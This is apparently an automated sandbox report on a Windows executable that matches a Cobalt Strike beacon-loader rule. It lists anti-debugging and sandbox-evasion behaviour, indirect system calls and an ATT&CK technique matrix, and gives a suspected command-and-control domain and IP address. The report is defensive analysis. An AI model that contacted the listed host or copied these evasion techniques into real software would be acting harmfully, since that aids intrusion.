          barindex
          Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACE2A000_2_00007FF60ACE2A00
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC5D0700_2_00007FF60AC5D070
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACF03E00_2_00007FF60ACF03E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC5C3A00_2_00007FF60AC5C3A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACDE3400_2_00007FF60ACDE340
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC665100_2_00007FF60AC66510
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC442F00_2_00007FF60AC442F0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC968000_2_00007FF60AC96800
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACDE6240_2_00007FF60ACDE624
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACD7C0C0_2_00007FF60ACD7C0C
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC73C000_2_00007FF60AC73C00
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACC9CC00_2_00007FF60ACC9CC0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACC9A4C0_2_00007FF60ACC9A4C
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC69F800_2_00007FF60AC69F80
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACC9FAC0_2_00007FF60ACC9FAC
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC520E00_2_00007FF60AC520E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9DDE00_2_00007FF60AC9DDE0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACDFEA80_2_00007FF60ACDFEA8
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACBBE380_2_00007FF60ACBBE38
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC6B1B00_2_00007FF60AC6B1B0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC751A00_2_00007FF60AC751A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACD32580_2_00007FF60ACD3258
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACDB7D40_2_00007FF60ACDB7D4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9D7E00_2_00007FF60AC9D7E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACD378C0_2_00007FF60ACD378C
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACC97B40_2_00007FF60ACC97B4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACDD7480_2_00007FF60ACDD748
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC657700_2_00007FF60AC65770
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC7F8D00_2_00007FF60AC7F8D0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC678E00_2_00007FF60AC678E0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC4F5A00_2_00007FF60AC4F5A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC5F6400_2_00007FF60AC5F640
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: String function: 00007FF60ACB8D48 appears 1485 times
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: String function: 00007FF60AC8BAE0 appears 154 times
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: String function: 00007FF60AC4BF60 appears 116 times
          Source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
          Source: classification engineClassification label: mal96.troj.evad.winEXE@1/0@1/1
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC946A0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,GetCurrentProcessId,Process32NextW,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60AC946A0
          Source: rdD2B4MLXl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: rdD2B4MLXl.exeString found in binary or memory: SOFTWARE\TrendMicro\OSCEUpdater/install/xbc_install/reschedule/uninstall/check/test_check/xbc_check_now/test_xbc_check_now
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: version.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: wtsapi32.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: dbghelp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
          Source: rdD2B4MLXl.exeStatic PE information: Image base 0x140000000 > 0x60000000
          Source: rdD2B4MLXl.exeStatic file information: File size 1884160 > 1048576
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: rdD2B4MLXl.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: rdD2B4MLXl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\ws\workspace\OSCE\OSCE_Common_Onpremise_2019_SP1R2_REL\build\src\tool\RPDownloader\x64\Release\SupportConnector_x64.pdb source: rdD2B4MLXl.exe
          Source: rdD2B4MLXl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: rdD2B4MLXl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: rdD2B4MLXl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: rdD2B4MLXl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: rdD2B4MLXl.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACF2FC0 InitializeCriticalSection,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_00007FF60ACF2FC0
          Source: rdD2B4MLXl.exeStatic PE information: section name: _RDATA
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52276 push ds; retf 0_3_00007FF4B9A52277
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A529B1 push ss; retf 0_3_00007FF4B9A529B3
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A539BB push ss; iretd 0_3_00007FF4B9A539E7
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52C01 push ds; retf 0_3_00007FF4B9A52C5B
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52C38 push ds; retf 0_3_00007FF4B9A52C5B
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52C3A push ds; retf 0_3_00007FF4B9A52C5B
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A523AA push ss; retf 0_3_00007FF4B9A523DB
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A56BA1 pushad ; retf 0_3_00007FF4B9A56BBF
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A523B6 push ss; retf 0_3_00007FF4B9A523DB
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52EAC push ss; retf 0_3_00007FF4B9A52EB7
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52EF1 push ss; retf 0_3_00007FF4B9A52EB7
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A51E08 push ds; retf 0_3_00007FF4B9A51E1B
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A52DA9 push ss; ret 0_3_00007FF4B9A52DAB
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A51582 push ds; retf 0_3_00007FF4B9A51583
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A51DF2 push ds; retf 0_3_00007FF4B9A51E1B
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A570F7 push esi; iretd 0_3_00007FF4B9A570A4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A57160 push edx; ret 0_3_00007FF4B9A57177
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A57092 push esi; iretd 0_3_00007FF4B9A570A4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A57076 push esi; iretd 0_3_00007FF4B9A570A4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A570C6 push esi; iretd 0_3_00007FF4B9A570E8
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_3_00007FF4B9A5702A push esi; iretd 0_3_00007FF4B9A570A4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC946A0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,GetCurrentProcessId,Process32NextW,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60AC946A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeAPI coverage: 0.2 %
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB4FDC FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00007FF60ACB4FDC
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC4AA30 GetSystemInfo,GetTickCount,SwitchToThread,Sleep,GetTickCount,Sleep,0_2_00007FF60AC4AA30
          Source: rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.1950257094.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE12A000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2233555017.000001CBFE1B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeProcess information queried: ProcessInformationJump to behavior

          Anti Debugging

          barindex
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeThread information set: HideFromDebuggerJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB8B18 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF60ACB8B18
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB8B18 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF60ACB8B18
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC946A0 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,GetCurrentProcessId,Process32NextW,GetLastError,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF60AC946A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACF2FC0 InitializeCriticalSection,GetSystemDirectoryW,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_00007FF60ACF2FC0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC9CA80 CryptAcquireContextA,GetLastError,CryptCreateHash,GetLastError,GetProcessHeap,HeapAlloc,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptGetHashParam,GetLastError,GetProcessHeap,HeapFree,CryptDestroyHash,CryptReleaseContext,0_2_00007FF60AC9CA80
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB82A0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF60ACB82A0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACC68E8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF60ACC68E8

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtOpenFile: Indirect: 0x1CBFE0D0000Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtQueryInformationProcess: Indirect: 0x1CBFF9B344DJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtClose: Indirect: 0x1CBFF9D6C31
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtResumeThread: Indirect: 0x1CBFF9B828EJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtQuerySystemInformation: Indirect: 0x1CBFF9D6180Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtQueryInformationProcess: Indirect: 0x7FF4B9AB3F45Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtOpenFile: Indirect: 0x1CBFF9D0D97Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtSetSecurityObject: Indirect: 0x1CBFE0A0000Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtSetSecurityObject: Indirect: 0x1CBFE0F0000Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtResumeThread: Indirect: 0x1CBFFD1206BJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtSuspendThread: Indirect: 0x1CBFF9D6977Jump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtClose: Indirect: 0x1CBFF9BE404
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtSetInformationProcess: Indirect: 0x1CBFF9CA96EJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeNtQueryInformationProcess: Indirect: 0x7FF4B9AB03AFJump to behavior
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC8CA20 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateFileMappingW,0_2_00007FF60AC8CA20
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF60ACEBCB8
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF60ACEBADC
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: try_get_function,GetLocaleInfoW,0_2_00007FF60ACE1EAC
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF60ACEB2CC
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: EnumSystemLocalesW,0_2_00007FF60ACE18C0
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: EnumSystemLocalesW,0_2_00007FF60ACEB5E4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: EnumSystemLocalesW,0_2_00007FF60ACEB6B4
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60ACB8998 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF60ACB8998
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeCode function: 0_2_00007FF60AC73C00 SHGetFolderPathW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,GetVersionExW,GetLastError,_invalid_parameter_noinfo_noreturn,0_2_00007FF60AC73C00
          Source: C:\Users\user\Desktop\rdD2B4MLXl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000000.00000003.1935801896.00007FF4B9A50000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: rdD2B4MLXl.exe PID: 4268, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
          Command and Scripting Interpreter
          1
          DLL Side-Loading
          1
          Abuse Elevation Control Mechanism
          11
          Virtualization/Sandbox Evasion
          OS Credential Dumping1
          System Time Discovery
          Remote Services11
          Archive Collected Data
          21
          Encrypted Channel
          Exfiltration Over Other Network Medium1
          Data Encrypted for Impact
          CredentialsDomainsDefault Accounts1
          Native API
          Boot or Logon Initialization Scripts1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          LSASS Memory151
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media1
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Abuse Elevation Control Mechanism
          Security Account Manager11
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
          Obfuscated Files or Information
          NTDS2
          Process Discovery
          Distributed Component Object ModelInput Capture113
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading
          LSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials15
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          rdD2B4MLXl.exe6%VirustotalBrowse
          rdD2B4MLXl.exe3%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe0;0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describej0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeO0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describex0%Avira URL Cloudsafe
          https://cysdetred-support.com/00%Avira URL Cloudsafe
          cysdetred-support.com0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeSL0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/described10%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describen0%Avira URL Cloudsafe
          http://www.winimage.com/zLibDll1.2.110%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describez0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describeB0%Avira URL Cloudsafe
          https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe6;0%Avira URL Cloudsafe
          https://cysdetred-support.com/0%Avira URL Cloudsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          bg.microsoft.map.fastly.net
          199.232.210.172
          truefalse
            high
            cysdetred-support.com
            3.69.83.191
            truetrue
              unknown
              NameMaliciousAntivirus DetectionReputation
              cysdetred-support.comtrue
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describefalse
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describejrdD2B4MLXl.exe, 00000000.00000003.3050700142.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3503906838.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.3274348675.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000002.3669874720.000001CBFE179000.00000004.00000020.00020000.00000000.sdmp, rdD2B4MLXl.exe, 00000000.00000003.2743449805.000001CBFE17B000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/describe0;rdD2B4MLXl.exe, 00000000.00000002.3669800845.000001CBFE12A000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://cysdetred-support.com/services/data/v36.0/sobjects/account/described1rdD2B4MLXl.exe, 00000000.00000003.2482854973.000001CBFE1C9000.00000004.00000020.00020000.00000000.sdmpfalse
